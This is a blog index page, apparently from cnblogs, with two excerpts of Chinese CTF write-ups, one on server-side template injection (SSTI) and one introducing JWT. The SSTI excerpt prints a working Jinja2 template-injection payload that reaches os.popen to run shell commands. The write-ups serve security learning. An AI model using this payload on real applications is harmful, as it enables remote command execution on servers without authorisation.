摘要:
SSTI原理分析 参考进阶 361-362.无过滤 payload1: ?name={{ config.__class__.__init__.__globals__['os'].popen('ls ../'). read() }} shell命令?name={{ config.__class__. 阅读全文
posted @ 2021-11-07 20:01
_Nov1ce
阅读(620)
评论(0)
推荐(0)
摘要:
前置知识: jwt(JSON Web Token)是一串json格式的字符串,由服务端用加密算法对信息签名来保证其完 整性和不可伪造。Token里可以包含所有必要信息,这样服务端就无需保存任何关于用户或会话的 信息,JWT可用于身份认证、会话状态维持、信息交换等。它的出现是为了在网络应用环境间传递 阅读全文
posted @ 2021-11-07 19:54
_Nov1ce
阅读(430)
评论(0)
推荐(0)
浙公网安备 33010602011771号